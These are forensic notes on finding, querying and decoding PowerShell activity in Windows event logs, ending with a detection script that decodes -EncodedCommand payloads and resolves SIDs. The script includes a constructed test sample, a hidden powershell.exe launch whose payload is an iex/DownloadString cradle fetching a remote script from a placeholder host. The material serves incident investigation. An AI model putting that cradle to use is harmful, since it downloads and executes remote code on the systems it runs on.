1. Where are PowerShell logs stored?
- Event Viewer > Applications and Services Logs > Microsoft > Windows > PowerShell > Operational
- On disk this is %SystemRoot%\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx
- The entries that matter for investigations are Event ID 4104 (Script Block Logging, the actual script text) and 4103 (Module Logging, pipeline/command invocations). Full 4104 coverage requires Script Block Logging to be enabled via policy; without it, PowerShell 5+ only logs script blocks it considers suspicious, at Warning level.
- The legacy "Windows PowerShell" log (Applications and Services Logs > Windows PowerShell) still records engine start/stop (Event IDs 400/403) and is useful when the Operational log has been cleared.
2. How to view PowerShell logs via CLI
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10 | Format-List
- Format-List shows the full Message (the script text in 4104 events); the default table view truncates it.
3. Decoding Base64 Encoded PowerShell Payloads
- Attackers often hide commands using -EncodedCommand (often abbreviated to -enc, -ec or -e on the command line).
- The argument is Base64 of UTF-16LE text, so it must be decoded with the Unicode encoding; decoding it as UTF-8 yields the characters interleaved with NUL bytes.
- Decode it like this:
[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("aQBlAHgA..."))
- The prefix aQBlAHgA decodes to "iex" (Invoke-Expression), a very common start of such payloads. The decoded text is frequently another layer (a second -EncodedCommand, or Gzip/Deflate data wrapped in a MemoryStream), so repeat the process until plain script appears.
4. Who Executed the Command? (SID -> Username)
- In logs, the user is recorded as a SID (Security Identifier); in Get-WinEvent output it is the UserId property of the event object.
- To convert it into a username:
$sid = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-...")
$user = $sid.Translate([System.Security.Principal.NTAccount])
$user.Value
- Translate() only works when the analysis machine can resolve the SID (local SAM or a reachable domain controller). For an .evtx exported from another host or domain it throws IdentityNotMappedException; in that case map the SID via the source system's HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList or its SAM hive instead.
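The three steps above (query the Operational log, decode -EncodedCommand payloads, resolve the caller's SID) chained into one script. This is an added example and not part of the original notes; the regex for the -EncodedCommand abbreviations, the function names and the constructed sample command line are my own assumptions, while the 4104 property layout (ScriptBlockText at index 2) and the Unicode decoding are as documented for PowerShell.

```powershell
# Added example (not from the original page): hunt for encoded commands in
# Script Block Logging events (ID 4104), decode them and name the caller.

function Get-DecodedEncodedCommand {
    param([Parameter(Mandatory)][string]$ScriptText)
    # powershell.exe/pwsh accept -EncodedCommand, -ec and -e (assumed regex, case-insensitive).
    # The value is base64 of UTF-16LE text, hence [Encoding]::Unicode rather than UTF8.
    $pattern = '(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})'
    foreach ($m in [regex]::Matches($ScriptText, $pattern)) {
        $b64 = $m.Groups[1].Value
        try {
            [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))
        } catch [FormatException] {
            # Not valid base64 (e.g. the log line was truncated); keep the raw value for review.
            "<undecodable: $b64>"
        }
    }
}

function Resolve-EventSid {
    param([System.Security.Principal.SecurityIdentifier]$Sid)
    if (-not $Sid) { return '<no UserId on event>' }
    try {
        $Sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch [System.Security.Principal.IdentityNotMappedException] {
        # SID from another machine/domain (typical for an exported .evtx): cannot be resolved here.
        "$($Sid.Value) (unresolved)"
    }
}

function Find-EncodedCommandEvents {
    param([int]$MaxEvents = 200)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 properties: 0 MessageNumber, 1 MessageTotal, 2 ScriptBlockText, 3 ScriptBlockId, 4 Path
            $script = [string]$_.Properties[2].Value
            foreach ($decoded in Get-DecodedEncodedCommand -ScriptText $script) {
                [pscustomobject]@{
                    Time          = $_.TimeCreated
                    User          = Resolve-EventSid $_.UserId
                    ScriptBlockId = $_.Properties[3].Value
                    Decoded       = $decoded
                }
            }
        }
}

# Constructed sample (not a captured event) so the decoder can be checked offline:
$payload = 'iex (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
$sample  = 'powershell.exe -nop -w hidden -enc ' +
           [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payload))
Get-DecodedEncodedCommand -ScriptText $sample

# Live run against the local Operational log (requires Script Block Logging and read access):
Find-EncodedCommandEvents -MaxEvents 500 | Format-List
```

Run it from an elevated prompt on the host under investigation; for an .evtx copied from elsewhere, swap the LogName key in $filter for Path = 'C:\case\Microsoft-Windows-PowerShell%4Operational.evtx' and expect the SIDs to come back marked unresolved.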